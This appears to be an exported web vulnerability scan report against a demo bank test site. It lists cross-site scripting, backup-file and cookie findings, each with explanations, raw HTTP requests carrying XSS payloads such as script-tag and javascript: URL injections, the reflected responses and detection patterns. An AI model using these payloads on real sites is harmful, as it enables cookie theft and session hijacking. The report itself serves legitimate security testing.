A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=">"'><img src="javascript:alert('XSS')">"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible IMG-Tag Embedded Javascript Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place by embedding potentially malicious JavaScript code using an IMG tag with a specific JavaScript link as its source. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=&house=&street=&address2=&town=&postcode=<attack>>"'><img%20src="javascript:alert('XSS')"></attack>&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
javascript:alert\('XSS'\)">POST /rootlogin.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=>"><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:56 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 108
Content-Type: text/html
Cache-control: private
<html>
<body>
Invalid Data >"><script>alert('XSS')</script><br>Please try again.
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&txtPassPhrase=333%2D333%2D3333test@test999.com&txtName=<attack>>"><script>alert('XSS')</script></attack><script>alert\('XSS'\)<\/script>GET /aspnet.aspx.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:22 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:18 GMT
ETag: "8c77e0c0a8dc11:8f6"
Content-Length: 0
Backup File (Appended .bak)A backup file with the extension .bak was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /aspnet.aspx<attack>.bak</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/pindex.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream POST /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login=>"><script>alert("XSS")</script>&password=333%2D333%2D3333test@test999.com&graphicOption=minimumHTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:41 GMT
X-Powered-By: ASP.NET
Location: banklogin.asp?err=Invalid Login: >"><script>alert("XSS")</script>
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
Possible Bracket Double Quote Cross-Site Scripting (Double Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the single quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
login=<attack>>"><script>alert("XSS")</script></attack>&password=333%2D333%2D3333test@test999.com&graphicOption=minimum<script>alert\("XSS"\)<\/script>GET /W3SVC1/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:09 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>Directory (/W3SVC1/)IIS Log file directory found.Restrict access to important directories or files.
<BR><BR><B>Apache:</B>
<BR><A HREF="http://httpd.apache.org/docs/misc/security_tips.html">Security Tips
for Server Configuration</A>
<BR><A HREF="http://www.w3.org/Security/faq/wwwsf3.html">Protecting Confidential
Documents at Your Site</A>
<BR><A HREF="http://linux.com/security/newsitem.phtml?sid=12&aid=3667">Securing
Apache - Access Control</A>
<BR><BR>
<B>IIS:</B><BR>
<A HREF="http://www.microsoft.com/TechNet/iis/ntfssec.asp">Implementing NTFS
Standard Permissions on Your Web Site</A><BR><BR>
<B>Netscape:</B><BR>
<A HREF="http://developer.netscape.com/docs/manuals/enterprise/40/ag/esaccess.htm">Controlling
Access to Your Server</A>
<BR><BR>
<B>General:</B>
<BR><A HREF="http://www.hwg.org/lists/hwg-servers/passwords.html">Password-protecting web pages</A>
<BR><A HREF="http://www.microsoft.com/technet/security/chaptr14.asp">Web Security</A>GET <attack><var name="path"/></attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
3\d\d |2\d\d |40[13] |5\d\dGET /forgot2.asp?msg2=no&msg=>"><script>alert('XSS')</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1846
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">>"><script>alert('XSS')</script></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Possible Bracket Double Quote Cross-Site Scripting (Single Quote)Cross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This is one of the most common type of cross-site scripting. The primary difference between this and the double quote attack is the use of apostrophes and quotes in the JavaScript code.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?msg2=no&msg=<attack>>"><script>alert('XSS')</script></attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
<script>alert\('XSS'\)<\/script>GET /login.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 2418
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Log in</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>L O G I N P L E A S E</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Please log in</center></a></b></td></tr>
<FORM ACTION="login1.asp" METHOD="post">
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><TD ALIGN="right"><font face="arial" size="2">e-Mail address: <INPUT TYPE="text" size="20" NAME="login"></INPUT> </TD>
<tr bgcolor=#003388><TD ALIGN="right"><font face="arial" size="2">Password: <INPUT TYPE="password" size="20" NAME="password"></INPUT> </TD>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="javascript:document.forms[0].submit()">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b>No account yet? Please join <a href="join.asp">here</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b>Forgot your password? Click <a href="forgot.asp">here</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Non Persistent CookiesCookies are small bits of data that are sent by the web
application but stored locally in the browser. This lets the application
use the cookie to pass information between pages and store variable
information. The web application controls what information is stored in a
cookie and how it is used. Typical types of information stored in cookies
are session Identifiers, personalization and customization information, and
in rare cases even usernames to enable automated logins. <br><br>There are
two different types of cookies: <i>session cookies</i> and <i>persistent
cookies</i>. Session cookies just live In the browser's memory, and are not
stored anywhere. Persistent cookies, however are stored on the browser's
hard drive. This can cause security and privacy issues depending on the
information stored in the cookie and how it is accessed.Remove all 'Expires=' tags from cookies, and ensure
that any COTS software being used does not use the tag (and thus use
persistent cookies). In the case of COTS, it may be necessary to write
custom code that capture the set-cookie statement coming from the COTS and
modifies it to a compliant state.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
GET /login.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 2418
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Log in</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>L O G I N P L E A S E</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Please log in</center></a></b></td></tr>
<FORM ACTION="login1.asp" METHOD="post">
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><TD ALIGN="right"><font face="arial" size="2">e-Mail address: <INPUT TYPE="text" size="20" NAME="login"></INPUT> </TD>
<tr bgcolor=#003388><TD ALIGN="right"><font face="arial" size="2">Password: <INPUT TYPE="password" size="20" NAME="password"></INPUT> </TD>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="javascript:document.forms[0].submit()">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b>No account yet? Please join <a href="join.asp">here</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b>Forgot your password? Click <a href="forgot.asp">here</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Possible Login FormA possible login form was found.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/link12/link13/index.htm
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
type=['"]?password['"]?POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=1"style="background:url(javascript:alert('XSS'))"%20"HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 205
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was 1"style="background:url(javascript:alert('XSS'))" "
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.POST <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/testing/
Content-Length: 61
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack>"style="background:url\(javascript:alert\('XSS'\)\)POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 178
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=test@<script>alert(document.cookie)</script>.comHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:51 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 434
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = test@<script>alert(document.cookie)</script>.com</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = test@<script>alert(document.cookie)</script>.com</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
Parameter-Based Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This cross-site scripting attack takes place because some web applications embed user input in JavaScript string literals.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
